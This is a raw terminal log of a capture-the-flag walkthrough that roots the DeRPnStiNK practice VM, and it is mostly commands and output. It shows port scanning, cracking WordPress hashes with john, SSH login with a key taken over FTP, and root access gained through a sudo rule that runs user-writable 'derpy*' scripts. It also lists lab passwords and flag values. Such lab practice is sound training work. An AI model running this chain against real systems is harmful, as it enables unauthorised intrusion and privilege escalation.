hack@kali:~$ nmap -A -p- 192.168.1.36
Starting Nmap 7.80 ( https://nmap.org ) at 2020-03-12 17:03 CET
Nmap scan report for DeRPnStiNK.homenet.telecomitalia.it (192.168.1.36)
Host is up (0.00031s latency).
Not shown: 65532 closed ports
PORT   STATE SERVICE VERSION
21/tcp open  ftp     vsftpd 3.0.2
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   1024 12:4e:f8:6e:7b:6c:c6:d8:7c:d8:29:77:d1:0b:eb:72 (DSA)
|   2048 72:c5:1c:5f:81:7b:dd:1a:fb:2e:59:67:fe:a6:91:2f (RSA)
|   256 06:77:0f:4b:96:0a:3a:2c:3b:f0:8c:2b:57:b5:97:bc (ECDSA)
|_  256 28:e8:ed:7c:60:7f:19:6c:e3:24:79:31:ca:ab:5d:2d (ED25519)
80/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
| http-robots.txt: 2 disallowed entries 
|_/php/ /temporary/
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: DeRPnStiNK
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 12.78 seconds


flag1(52E37291AEDF6A46D7D0BB8A6312F4F9F1AA4975C248C3F0E008CBA09D6E9166)

www-data@DeRPnStiNK:/var/www/html/php$ cat info.php
cat info.php
<?php
/* management interface can be found at /phpmyadmin
phpinfo();
?>


flag2(a7d355b26bda6bf1196ccffead0b2cf2b81f0a9de5b4876b44407f1dc07e51e6) 


$P$BW6NTkFvboVVCHU2R9qmNai1WfHSC41 | unclestinky 

$P$BgnU3VLAv.RWd3rdrkfVIuQr6mFvpd/ | admin 

hack@kali:~/CTF/OSCP/DeRPnStiNK:1$ sudo john --wordlist=/usr/share/wordlists/rockyou.txt hash2
Using default input encoding: UTF-8
Loaded 1 password hash (phpass [phpass ($P$ or $H$) 128/128 AVX 4x3])
Cost 1 (iteration count) is 8192 for all loaded hashes
Will run 4 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
wedgie57

admin:admin
unclestinky:wedgie57


ftp> get key.txt
local: key.txt remote: key.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for key.txt (1675 bytes).
226 Transfer complete.
1675 bytes received in 0.02 secs (107.7919 kB/s)
ftp> pwd
257 "/files/ssh/ssh/ssh/ssh/ssh/ssh/ssh"


hack@kali:~/CTF/OSCP/DeRPnStiNK:1$ chmod 700 key.txt 
hack@kali:~/CTF/OSCP/DeRPnStiNK:1$ ssh stinky@192.168.1.36 -i key.txt 
Ubuntu 14.04.5 LTS


                       ,~~~~~~~~~~~~~..
                       '  Derrrrrp  N  `
        ,~~~~~~,       |    Stink      | 
       / ,      \      ',  ________ _,"
      /,~|_______\.      \/
     /~ (__________)   
    (*)  ; (^)(^)':
        =;  ____  ;
          ; """"  ;=
   {"}_   ' '""' ' _{"}
   \__/     >  <   \__/
      \    ,"   ",  /
       \  "       /"
          "      "=
           >     <
          ="     "-
          -`.   ,'
                -
            `--'

Welcome to Ubuntu 14.04.5 LTS (GNU/Linux 4.4.0-31-generic i686)

 * Documentation:  https://help.ubuntu.com/

331 packages can be updated.
231 updates are security updates.

New release '16.04.6 LTS' available.
Run 'do-release-upgrade' to upgrade to it.

Last login: Mon Nov 13 00:31:29 2017 from 192.168.1.129
stinky@DeRPnStiNK:~$ 


stinky@DeRPnStiNK:~$ cd Desktop/
stinky@DeRPnStiNK:~/Desktop$ ls
flag.txt
stinky@DeRPnStiNK:~/Desktop$ cat flag.txt 
flag3(07f62b021771d3cf67e2e1faf18769cc5e5c119ad7d4d1847a11e11d6d5a7ecb)
stinky@DeRPnStiNK:~/Desktop$ 


mrderp:derpderpderpderpderpderpderp




mrderp@DeRPnStiNK:~/Documents$ sudo -l
Matching Defaults entries for mrderp on DeRPnStiNK:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User mrderp may run the following commands on DeRPnStiNK:
    (ALL) /home/mrderp/binaries/derpy*
mrderp@DeRPnStiNK:~/Documents$ cd ..
mrderp@DeRPnStiNK:~$ ll
total 68
drwx------ 10 mrderp mrderp 4096 Jan  9  2018 ./
drwxr-xr-x  4 root   root   4096 Nov 12  2017 ../
-rw-r--r--  1 mrderp mrderp  220 Nov 12  2017 .bash_logout
-rw-r--r--  1 mrderp mrderp 3637 Nov 12  2017 .bashrc
drwx------  8 mrderp mrderp 4096 Nov 13  2017 .cache/
drwx------ 14 mrderp mrderp 4096 Nov 13  2017 .config/
drwxr-xr-x  2 mrderp mrderp 4096 Nov 13  2017 Desktop/
-rw-r--r--  1 mrderp mrderp   25 Nov 13  2017 .dmrc
drwxr-xr-x  2 mrderp mrderp 4096 Nov 13  2017 Documents/
drwxr-xr-x  2 mrderp mrderp 4096 Nov 13  2017 Downloads/
drwx------  3 mrderp mrderp 4096 Nov 13  2017 .gconf/
-rw-------  1 mrderp mrderp  334 Nov 13  2017 .ICEauthority
drwx------  3 mrderp mrderp 4096 Nov 13  2017 .local/
-rw-r--r--  1 mrderp mrderp  675 Nov 12  2017 .profile
drwx------  2 mrderp mrderp 4096 Nov 12  2017 .ssh/
-rw-------  1 mrderp mrderp   55 Nov 13  2017 .Xauthority
-rw-------  1 mrderp mrderp  831 Nov 13  2017 .xsession-errors
mrderp@DeRPnStiNK:~$ pwd
/home/mrderp
mrderp@DeRPnStiNK:~$ mkdi
mkdir        mkdiskimage  
mrderp@DeRPnStiNK:~$ mkdi
mkdir        mkdiskimage  
mrderp@DeRPnStiNK:~$ mkdir binaries
mrderp@DeRPnStiNK:~$ cd binaries/
mrderp@DeRPnStiNK:~/binaries$ touch derpy.sh
mrderp@DeRPnStiNK:~/binaries$ 
mrderp@DeRPnStiNK:~/binaries$ echo "#!/bin/bash" >> derpy.sh 
bash: !/bin/bash: event not found
mrderp@DeRPnStiNK:~/binaries$ vi derpy.sh 
mrderp@DeRPnStiNK:~/binaries$ 
mrderp@DeRPnStiNK:~/binaries$ 
mrderp@DeRPnStiNK:~/binaries$ chmod +x derpy.sh 
mrderp@DeRPnStiNK:~/binaries$ sudo ./derpy.sh 
# 
# id
uid=0(root) gid=0(root) groups=0(root)
# cd /root
# ls
Desktop  Documents  Downloads
# cd Docum
/bin/sh: 5: cd: can't cd to Docum
# cd Documents
# ls
# ls -la
total 8
drwxr-xr-x  2 root root 4096 Nov 12  2017 .
drwx------ 14 root root 4096 Jan  9  2018 ..
# cd ..
# cd Desktop
# ls -la
total 12
drwxr-xr-x  2 root root 4096 Nov 13  2017 .
drwx------ 14 root root 4096 Jan  9  2018 ..
-rw-r--r--  1 root root  180 Jan  9  2018 flag.txt
# cat flag.txt
flag4(49dca65f362fee401292ed7ada96f96295eab1e589c52e4e66bf4aedda715fdd)

Congrats on rooting my first VulnOS!

Hit me up on twitter and let me know your thoughts!

@securekomodo



